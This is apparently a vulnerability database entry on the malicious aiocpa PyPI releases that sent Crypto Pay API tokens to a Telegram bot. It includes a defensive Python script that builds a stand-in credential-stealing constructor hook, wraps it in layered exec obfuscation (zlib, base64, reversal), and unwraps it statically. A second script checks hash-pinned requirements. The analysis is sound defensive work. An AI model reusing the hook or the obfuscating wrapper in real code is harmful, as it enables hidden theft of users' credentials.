
Cloud Vulnerability DB
A community-led vulnerabilities database
The aiocpa package, an asynchronous Python client for the Crypto Pay API, was found to contain malicious code in versions 0.1.13 and 0.1.14. The issue was disclosed on November 21, 2024, and assigned the identifier GHSA-486g-47cc-8wxf. The malicious code was introduced in version 0.1.13 and persisted through version 0.1.14, after which all versions of the project were removed from PyPI (PyPI Blog, GitHub Advisory).
The malicious code was heavily obfuscated and ran automatically when the module was imported, so simply importing the package in an application was enough to trigger it. The payload was wrapped in 50 layers of obfuscation built from byte-encoding, compression, and string reversal, each layer decoding and executing the next. Once unwrapped, it overrode the constructor of the library's main client class and forwarded the credentials passed to that constructor to a configured Telegram bot endpoint, capturing them at the moment a client object is created. The advisory assigns a CVSS v4 base score of 8.3 (High), with a local attack vector (the code runs inside the process that imports the package), low attack complexity, and high impact on both confidentiality and integrity (PyPI Blog, GitHub Advisory).
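To show how the layered obfuscation described above is analysed without ever running it, here is an added example (not code from aiocpa, the advisory, or PyPI). It builds a constructed, harmless stand-in payload using the same three techniques the advisory names (compression, base64 byte-encoding, reversal) wrapped in exec() calls, then peels the layers statically by walking the AST and applying only a whitelist of decode operations. The exact wrapping shape (__import__('zlib').decompress(...)), the 10-layer depth of the sample (the real package used 50), the class name Client, the BOT_TOKEN_PLACEHOLDER string and the indicator list are all assumptions made for the example.

```python
"""Static unwrapping of layered exec(...) obfuscation. Added example, not aiocpa code.
Nothing here executes the payload: every layer is decoded by evaluating a small
whitelist of AST node types and refusing anything else."""
import ast
import base64
import binascii
import zlib

# CONSTRUCTED inner payload imitating the reported behaviour (hook the client
# constructor, post the token to a Telegram bot URL). Hypothetical names: Client,
# BOT_TOKEN_PLACEHOLDER. It is never executed by this script.
INNER_SOURCE = (
    "import urllib.request\n"
    "_orig_init = Client.__init__\n"
    "def _init(self, token, *args, **kwargs):\n"
    "    urllib.request.urlopen(\n"
    "        'https://api.telegram.org/botBOT_TOKEN_PLACEHOLDER/sendMessage?text=' + token)\n"
    "    _orig_init(self, token, *args, **kwargs)\n"
    "Client.__init__ = _init\n"
)

def wrap_layer(src: str) -> str:
    """One obfuscation layer: zlib-compress, base64-encode, reverse, wrap in exec()."""
    blob = base64.b64encode(zlib.compress(src.encode()))[::-1]
    return ("exec(__import__('zlib').decompress("
            f"__import__('base64').b64decode({blob!r}[::-1])))")

def build_sample(layers: int) -> str:
    src = INNER_SOURCE
    for _ in range(layers):
        src = wrap_layer(src)
    return src

SAMPLE_LAYERS = 10          # assumption for the sample; the real package used 50
OBFUSCATED_SAMPLE = build_sample(SAMPLE_LAYERS)

# Decoding primitives we are willing to apply statically. Anything else aborts.
SAFE_OPS = {
    "b64decode": base64.b64decode,
    "b85decode": base64.b85decode,
    "a85decode": base64.a85decode,
    "unhexlify": binascii.unhexlify,
    "decompress": zlib.decompress,
}

def _is_reverse_slice(s: ast.AST) -> bool:
    """True for the slice in x[::-1]."""
    return (isinstance(s, ast.Slice) and s.lower is None and s.upper is None
            and isinstance(s.step, ast.UnaryOp) and isinstance(s.step.op, ast.USub)
            and isinstance(s.step.operand, ast.Constant) and s.step.operand.value == 1)

def _eval_static(node: ast.AST):
    """Evaluate a decode chain without exec/eval: literals, [::-1], whitelisted calls."""
    if isinstance(node, ast.Constant) and isinstance(node.value, (bytes, str)):
        return node.value
    if isinstance(node, ast.Subscript) and _is_reverse_slice(node.slice):
        return _eval_static(node.value)[::-1]
    if isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute):
        if node.func.attr in SAFE_OPS and len(node.args) == 1 and not node.keywords:
            return SAFE_OPS[node.func.attr](_eval_static(node.args[0]))
        if node.func.attr == "decode" and not node.args:
            return _eval_static(node.func.value).decode()
    raise ValueError("unsupported construct, refusing to guess: " + ast.dump(node)[:80])

def _exec_argument(src: str):
    """Return the argument of a top-level exec()/eval() statement, or None."""
    for stmt in ast.parse(src).body:
        if (isinstance(stmt, ast.Expr) and isinstance(stmt.value, ast.Call)
                and isinstance(stmt.value.func, ast.Name)
                and stmt.value.func.id in ("exec", "eval") and stmt.value.args):
            return stmt.value.args[0]
    return None

def unwrap(src: str, max_layers: int = 200):
    """Peel exec() layers until plain source remains. Returns (source, layer_count)."""
    for layers in range(max_layers):
        arg = _exec_argument(src)
        if arg is None:
            return src, layers
        payload = _eval_static(arg)
        src = payload.decode() if isinstance(payload, bytes) else payload
    raise RuntimeError(f"more than {max_layers} layers; stopping")

# Generic strings worth flagging in recovered source (assumption, not advisory IOCs).
INDICATORS = ("api.telegram.org", "__init__ =", "sendMessage")

def indicators(src: str) -> list:
    return [i for i in INDICATORS if i in src]

if __name__ == "__main__":
    recovered, n = unwrap(OBFUSCATED_SAMPLE)
    print(f"peeled {n} layers; indicators: {indicators(recovered)}")
    print(recovered)
```

The point of the whitelist is that the unwrapper never calls exec, eval, os or subprocess on attacker-controlled data: a layer that uses anything other than the listed decoders raises instead of being run, which is the failure mode you want when triaging an unknown package.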
The malware targeted Crypto Pay users by harvesting and exfiltrating sensitive credentials, including API tokens, API server addresses, and other Crypto Pay-related data, to a remote Telegram bot. The potential impact includes unauthorized access to crypto wallets and financial loss, though the extent of actual exploitation is unknown (PyPI Blog).
All versions of aiocpa have been removed from PyPI. Anyone who installed aiocpa should check which version is present (for example with pip show aiocpa or by inspecting the lock file), audit their usage of the library, and consider alternatives. Because the payload forwarded credentials at client construction time, any Crypto Pay API token loaded by an installation of 0.1.13 or 0.1.14 should be treated as compromised and rotated. It is also recommended to add outbound network controls, such as egress firewalls, to monitor or block connections to unknown destinations (the Telegram bot API in this case). Finally, pin dependencies to exact versions and record their hashes so that a replaced or newly uploaded release cannot be installed silently under an existing package/version constraint (PyPI Blog).
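The following added example (not from the advisory and not pip's own code) shows what hash-pinned requirements protect against, in the spirit of the recommendation above: it parses a constructed requirements file, flags entries that are unpinned or carry no --hash, and accepts a downloaded artifact only if its digest matches a pinned value, which is the check pip performs in --require-hashes mode. The package names, the "wheel" bytes and the requirements text are constructed for the example.

```python
"""Dependency pinning with hashes. Added example; the lock file and wheel bytes
are CONSTRUCTED and the package names are hypothetical."""
import hashlib
import tempfile
from pathlib import Path

# Constructed artifact standing in for a downloaded wheel, and its real digest.
FAKE_WHEEL = b"PK\x03\x04 constructed stand-in for examplepkg-1.2.3-py3-none-any.whl"
GOOD_DIGEST = hashlib.sha256(FAKE_WHEEL).hexdigest()

SAMPLE_REQUIREMENTS = f"""\
# constructed lock file; only the first entry is in the safe form
examplepkg==1.2.3 \\
    --hash=sha256:{GOOD_DIGEST}
unpinnedpkg>=2.0
hashlesspkg==0.4.6
"""

def parse_requirements(text: str) -> list:
    """Return [(spec, {algo: {digest, ...}})] with backslash continuations joined."""
    joined = text.replace("\\\n", " ")
    entries = []
    for raw in joined.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("-"):      # skip comments and pip options
            continue
        tokens = line.split()
        hashes = {}
        for tok in tokens[1:]:
            if tok.startswith("--hash="):
                algo, _, digest = tok[len("--hash="):].partition(":")
                hashes.setdefault(algo, set()).add(digest.lower())
        entries.append((tokens[0], hashes))
    return entries

def audit(text: str) -> list:
    """List the entries a hash-checking install would refuse, and why."""
    findings = []
    for spec, hashes in parse_requirements(text):
        if "==" not in spec:
            findings.append(f"{spec}: not pinned to an exact version")
        if not hashes:
            findings.append(f"{spec}: no --hash, so a replaced or newly uploaded file is accepted")
    return findings

def artifact_matches(path, hashes: dict) -> bool:
    """Accept the file only if its digest equals one pinned value (what pip enforces)."""
    data = Path(path).read_bytes()
    return any(hashlib.new(algo, data).hexdigest() in digests
               for algo, digests in hashes.items())

def demo() -> dict:
    """Write the constructed wheel and a tampered copy, then check both."""
    spec, hashes = parse_requirements(SAMPLE_REQUIREMENTS)[0]
    with tempfile.TemporaryDirectory() as tmp:
        good = Path(tmp, "examplepkg-1.2.3-py3-none-any.whl")
        good.write_bytes(FAKE_WHEEL)
        bad = Path(tmp, "examplepkg-1.2.3-tampered.whl")
        bad.write_bytes(FAKE_WHEEL + b"\x00")
        return {"spec": spec,
                "good_accepted": artifact_matches(good, hashes),
                "tampered_accepted": artifact_matches(bad, hashes),
                "findings": audit(SAMPLE_REQUIREMENTS)}

if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "=", value)
```

In practice the hashes are produced with pip-compile --generate-hashes (pip-tools) or pip hash on a downloaded file, and enforced with pip install --require-hashes -r requirements.txt; pip also switches to hash-checking mode automatically as soon as any requirement line carries a --hash, so a single hashed entry forces every other entry to be pinned and hashed too.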
Source: This report was generated using AI